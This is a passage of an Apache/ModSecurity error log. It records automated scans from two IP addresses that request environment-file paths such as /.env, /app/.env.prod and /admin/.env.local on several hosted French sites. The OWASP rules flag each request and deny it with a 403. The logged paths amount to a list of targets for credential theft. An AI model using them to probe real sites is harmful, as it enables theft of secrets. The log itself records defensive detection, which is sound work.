[Tue May 12 05:26:57.372554 2026] [security2:error] [pid 1825179:tid 1825207] [client 51.195.102.189:42836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAdr1yOh9TvizeziezQAAAEk"]
[Tue May 12 05:26:57.372626 2026] [security2:error] [pid 1825287:tid 1825319] [client 51.195.102.189:42872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/admin/.env.prod"] [unique_id "agKeAQgpmE1yW0glLdgttgAAAM4"]
[Tue May 12 05:26:57.372679 2026] [security2:error] [pid 1820198:tid 1820220] [client 51.195.102.189:43014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/www/.env"] [unique_id "agKeAc1tk6y7yBJLpJo5NAAAAJQ"]
[Tue May 12 05:26:57.372775 2026] [security2:error] [pid 1825287:tid 1825319] [client 51.195.102.189:42872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/admin/.env.prod"] [unique_id "agKeAQgpmE1yW0glLdgttgAAAM4"]
[Tue May 12 05:26:57.372871 2026] [security2:error] [pid 1820198:tid 1820220] [client 51.195.102.189:43014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAc1tk6y7yBJLpJo5NAAAAJQ"]
[Tue May 12 05:26:57.372989 2026] [security2:error] [pid 1825287:tid 1825319] [client 51.195.102.189:42872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAQgpmE1yW0glLdgttgAAAM4"]
[Tue May 12 05:26:57.373015 2026] [security2:error] [pid 1825287:tid 1825313] [client 51.195.102.189:42888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env.prod"] [unique_id "agKeAQgpmE1yW0glLdgttwAAAMg"]
[Tue May 12 05:26:57.373081 2026] [security2:error] [pid 1808852:tid 1808876] [client 51.195.102.189:42916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env.local"] [unique_id "agKeARfeipD4uoG21FowVgAAABU"]
[Tue May 12 05:26:57.373129 2026] [security2:error] [pid 1808852:tid 1808870] [client 51.195.102.189:43060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/storage/.env"] [unique_id "agKeARfeipD4uoG21FowVQAAAA8"]
[Tue May 12 05:26:57.373175 2026] [security2:error] [pid 1825287:tid 1825313] [client 51.195.102.189:42888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env.prod"] [unique_id "agKeAQgpmE1yW0glLdgttwAAAMg"]
[Tue May 12 05:26:57.373242 2026] [security2:error] [pid 1808852:tid 1808876] [client 51.195.102.189:42916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env.local"] [unique_id "agKeARfeipD4uoG21FowVgAAABU"]
[Tue May 12 05:26:57.373307 2026] [security2:error] [pid 1808852:tid 1808870] [client 51.195.102.189:43060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/storage/.env"] [unique_id "agKeARfeipD4uoG21FowVQAAAA8"]
[Tue May 12 05:26:57.373371 2026] [security2:error] [pid 1825287:tid 1825313] [client 51.195.102.189:42888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAQgpmE1yW0glLdgttwAAAMg"]
[Tue May 12 05:26:57.373434 2026] [security2:error] [pid 1808852:tid 1808876] [client 51.195.102.189:42916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARfeipD4uoG21FowVgAAABU"]
[Tue May 12 05:26:57.373497 2026] [security2:error] [pid 1808852:tid 1808870] [client 51.195.102.189:43060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARfeipD4uoG21FowVQAAAA8"]
[Tue May 12 05:26:57.373653 2026] [security2:error] [pid 1825287:tid 1825312] [client 51.195.102.189:43040] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env"] [unique_id "agKeAQgpmE1yW0glLdgtuAAAAMc"]
[Tue May 12 05:26:57.373807 2026] [security2:error] [pid 1825287:tid 1825312] [client 51.195.102.189:43040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env"] [unique_id "agKeAQgpmE1yW0glLdgtuAAAAMc"]
[Tue May 12 05:26:57.373826 2026] [security2:error] [pid 1825179:tid 1825220] [client 51.195.102.189:42946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backend/.env.prod"] [unique_id "agKeAdr1yOh9TvizeziezwAAAFY"]
[Tue May 12 05:26:57.373988 2026] [security2:error] [pid 1825179:tid 1825220] [client 51.195.102.189:42946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backend/.env.prod"] [unique_id "agKeAdr1yOh9TvizeziezwAAAFY"]
[Tue May 12 05:26:57.374031 2026] [security2:error] [pid 1825287:tid 1825312] [client 51.195.102.189:43040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAQgpmE1yW0glLdgtuAAAAMc"]
[Tue May 12 05:26:57.374189 2026] [security2:error] [pid 1825179:tid 1825220] [client 51.195.102.189:42946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAdr1yOh9TvizeziezwAAAFY"]
[Tue May 12 05:26:57.376276 2026] [security2:error] [pid 1844863:tid 1844879] [client 51.195.102.189:42918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env.test"] [unique_id "agKeAfaAnTZtx1_H_wy20wAAAUo"]
[Tue May 12 05:26:57.376433 2026] [security2:error] [pid 1844863:tid 1844879] [client 51.195.102.189:42918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env.test"] [unique_id "agKeAfaAnTZtx1_H_wy20wAAAUo"]
[Tue May 12 05:26:57.376620 2026] [security2:error] [pid 1844863:tid 1844879] [client 51.195.102.189:42918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAfaAnTZtx1_H_wy20wAAAUo"]
[Tue May 12 05:26:57.377920 2026] [security2:error] [pid 1820198:tid 1820210] [client 51.195.102.189:42906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backend/.env.dev"] [unique_id "agKeAc1tk6y7yBJLpJo5NQAAAIo"]
[Tue May 12 05:26:57.378073 2026] [security2:error] [pid 1820198:tid 1820210] [client 51.195.102.189:42906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backend/.env.dev"] [unique_id "agKeAc1tk6y7yBJLpJo5NQAAAIo"]
[Tue May 12 05:26:57.378276 2026] [security2:error] [pid 1820198:tid 1820210] [client 51.195.102.189:42906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAc1tk6y7yBJLpJo5NQAAAIo"]
[Tue May 12 05:26:57.382790 2026] [security2:error] [pid 1820198:tid 1820212] [client 51.195.102.189:42992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/admin/.env.local"] [unique_id "agKeAc1tk6y7yBJLpJo5NgAAAIw"]
[Tue May 12 05:26:57.382959 2026] [security2:error] [pid 1820198:tid 1820212] [client 51.195.102.189:42992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/admin/.env.local"] [unique_id "agKeAc1tk6y7yBJLpJo5NgAAAIw"]
[Tue May 12 05:26:57.383190 2026] [security2:error] [pid 1820198:tid 1820212] [client 51.195.102.189:42992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAc1tk6y7yBJLpJo5NgAAAIw"]
[Tue May 12 05:27:03.859783 2026] [security2:error] [pid 1820198:tid 1820209] [client 102.165.0.222:36563] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeB81tk6y7yBJLpJo5OAAAAIk"], referer: https://www.piregwan-genesis.com/
[Tue May 12 05:27:08.015228 2026] [authz_core:error] [pid 1825179:tid 1825205] [client 52.167.144.159:38849] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/error_log
[Tue May 12 05:27:48.290861 2026] [:error] [pid 1825179:tid 1825203] [client 23.137.105.63:42760] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 05:27:48.323693 2026] [security2:error] [pid 1842385:tid 1842406] [client 23.137.105.63:42772] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqQAAARA"]
[Tue May 12 05:27:48.323779 2026] [security2:error] [pid 1825287:tid 1825311] [client 23.137.105.63:42778] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agKeNAgpmE1yW0glLdgt1QAAAMY"]
[Tue May 12 05:27:48.323866 2026] [security2:error] [pid 1842385:tid 1842406] [client 23.137.105.63:42772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqQAAARA"]
[Tue May 12 05:27:48.323917 2026] [:error] [pid 1844863:tid 1844881] [client 23.137.105.63:42850] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 05:27:48.323953 2026] [security2:error] [pid 1825287:tid 1825311] [client 23.137.105.63:42778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agKeNAgpmE1yW0glLdgt1QAAAMY"]
[Tue May 12 05:27:48.324014 2026] [:error] [pid 1808852:tid 1808862] [client 23.137.105.63:42834] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 05:27:48.324084 2026] [security2:error] [pid 1842385:tid 1842406] [client 23.137.105.63:42772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqQAAARA"]
[Tue May 12 05:27:48.324187 2026] [security2:error] [pid 1825287:tid 1825311] [client 23.137.105.63:42778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agKeNAgpmE1yW0glLdgt1QAAAMY"]
[Tue May 12 05:27:48.326199 2026] [security2:error] [pid 1820198:tid 1820213] [client 23.137.105.63:42820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agKeNM1tk6y7yBJLpJo5UgAAAI0"]
[Tue May 12 05:27:48.326211 2026] [security2:error] [pid 1844863:tid 1844877] [client 23.137.105.63:42808] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agKeNPaAnTZtx1_H_wy28AAAAUg"]
